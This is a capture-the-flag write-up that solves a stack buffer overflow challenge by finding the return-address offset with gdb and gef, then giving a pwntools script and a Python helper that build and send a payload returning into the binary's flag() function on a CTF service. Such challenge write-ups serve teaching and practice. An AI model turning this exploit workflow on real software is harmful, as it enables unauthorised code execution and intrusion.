![ddcb5a5a1cceac2f48661f5a7bbc1985.png](621452062d74478d83b37c8a53a63256.png)
Let's run it and see what we get.
![b9727400a632351051e9842eece27e50.png](46b8f6ff51f84fccb089f2c56ad3610a.png)
Just takes some input.
Let's use **gdb** (with **gef**) to analyze the binary.
First, find the address of the function we want to return into
`info functions`
![c64b2a158a4b06d416f55536a7f5df04.png](ce40a315a501456b8cbe5ba23667f095.png)
So the function we want, `flag()`, is at `0x08048576`
Next, find the offset
1. Create a pattern
`pattern create 100`
2. Run the program with **r** and paste the pattern in as its input
Nice! We get a **segfault**.
![24b8793fb9f7cd3ea645f0d1c84cd599.png](c6722ae3e7d541058fbf29bd69068451.png)
**gdb** is telling us that the segfault is at `0x61616174`. That is the value that overwrote the saved return address and ended up in **EIP**, so the 4 pattern bytes it corresponds to tell us where the return address sits. Let's use it as our pattern search parameter to find the offset
`pattern search 0x61616174`
![5136d287918a16a14b649dc59e7d80d3.png](eec12c0426fe4328870d4041da859783.png)
There's our offset: **76** bytes of input before the saved return address.
We can test this by using **pi** (gef's inline Python) to print a test string and pasting its output into the program as input.
`pi print('A'*76 + 'B'*4)`
![9b9424712ed54c405caf261ebf9f933d.png](7d04c82e06d9464381202e72ebb1e1fb.png)
If all goes well, it should fill the buffer with `41` bytes and overwrite the saved return address, and therefore the instruction pointer, with `0x42424242` *(A = 0x41, B = 0x42)*
![911c20500bb29f3bdcdbf635c9de9477.png](8a131153f51f4597928701aeb0941815.png)
Cool, so we control the instruction pointer now.
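The two gef commands above and the `p32()` packing the exploit relies on are simple enough to reproduce by hand. The following is an added example, not code from the original write-up: it re-implements `pattern create` / `pattern search` with the same de Bruijn construction gef and pwntools use, recovers the offset from the crash value `0x61616174`, and assembles the ret2win payload with a bad-byte check. The only assumption beyond the page is that the input is read line-oriented, so a NUL or newline inside the packed address would truncate the payload.

```python
# Added example (not the write-up's own code): dependency-free versions of
# gef `pattern create` / `pattern search` and pwntools p32(), using only the
# values on the page (crash EIP 0x61616174, offset 76, flag() at 0x08048576).
import struct
from typing import Optional

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
WINDOW = 4  # 32-bit target: every 4-byte window of the pattern must be unique


def de_bruijn(alphabet: str = ALPHABET, n: int = WINDOW):
    """Yield the de Bruijn sequence B(k, n) one character at a time.

    Classic recursive construction (the one pwntools' cyclic() uses), so it
    produces "aaaabaaacaaad..." exactly like gef's pattern command.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def pattern_create(length: int) -> bytes:
    """Equivalent of gef `pattern create <length>`."""
    out = []
    for ch in de_bruijn():
        if len(out) == length:
            break
        out.append(ch)
    return "".join(out).encode()


def pattern_search(crash_value: int, length: int = 4096) -> Optional[int]:
    """Equivalent of gef `pattern search <value>` for a 32-bit crash.

    The faulting EIP is just the little-endian bytes that landed on the saved
    return address, so pack it that way and find those 4 bytes in the pattern.
    Returns None when they are not in the pattern (e.g. EIP was only partially
    overwritten, or the crash value is not pattern data at all).
    """
    needle = struct.pack("<I", crash_value)
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


def p32(addr: int) -> bytes:
    """Pack a 32-bit address little-endian, as pwntools p32() does."""
    return struct.pack("<I", addr)


def ret2win_payload(offset: int, target: int, bad_bytes: bytes = b"\x00\n") -> bytes:
    """`offset` bytes of filler followed by the address to return into.

    Assumption: the input is sent with sendline() and read by a line-oriented
    function, so a NUL or newline inside the packed address would cut the
    payload short. Refuse such addresses instead of silently sending them.
    """
    packed = p32(target)
    clashing = sorted(set(packed) & set(bad_bytes))
    if clashing:
        raise ValueError(
            f"{target:#010x} packs to {packed.hex()} and contains bad byte(s) "
            + ", ".join(f"{b:#04x}" for b in clashing)
        )
    return b"A" * offset + packed


def eip_after_overflow(payload: bytes, offset: int) -> int:
    """What the CPU loads into EIP on return: the 4 payload bytes that sit
    on the saved-return-address slot."""
    return struct.unpack("<I", payload[offset:offset + WINDOW])[0]


if __name__ == "__main__":
    crash_eip = 0x61616174  # the value gdb reported after sending the pattern
    offset = pattern_search(crash_eip)
    print(f"offset = {offset}")
    probe = b"A" * offset + b"B" * 4
    print(f"EIP after the A/B probe: {eip_after_overflow(probe, offset):#010x}")
    payload = ret2win_payload(offset, 0x08048576)
    print(f"payload ({len(payload)} bytes): {payload.hex()}")
```

`pattern_search` only needs the pattern prefix, so generating 4096 bytes is plenty for any realistic stack buffer; the de Bruijn property guarantees the 4-byte window is unique, which is why the lookup also works when the crash value is not 4-byte aligned with the start of the pattern.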
Now that we know the **offset** and the **function address**, we can write an exploit.
Here's my code:
```python
# import the pwntools library
from pwn import *

# start the binary locally; swap these two lines to target the remote service
io = process('./hidden_flag_function')
#io = remote('1e9f746024b2e701.247ctf.com', 50254)

# padding up to the saved return address, and the address of flag()
padding = b'A' * 76
funcloc = 0x08048576

# attach gdb to the running process for debugging (comment out for remote)
gdb.attach(io)

# receive the prompt line
io.recvline()

# send the payload: filler + little-endian address of flag()
io.sendline(padding + p32(funcloc))

# receive three lines of output
print(io.recvline())
print(io.recvline())
print(io.recvline())
```
![5c1fdce0faeed3a1f324fb95b869c0a0.png](ed473bb5148743bd858fbed68d9cf671.png)
Looks good! We landed in the `flag()` function, which then called `fgets()` and crashed (presumably because there is no flag file on the local machine for it to read, so locally that is expected). Let's fire it at the service by uncommenting the `io = remote()` line and commenting out the `gdb.attach(io)` and `io = process()` lines.
![21f5ff54dd607ff2a97cb9b8aebbe7a5.png](fb41f06c46e24561b84c17bb0b31b7f0.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #buffer_overflow #exploit_development #pwn #scripting #gdb #gef
Related: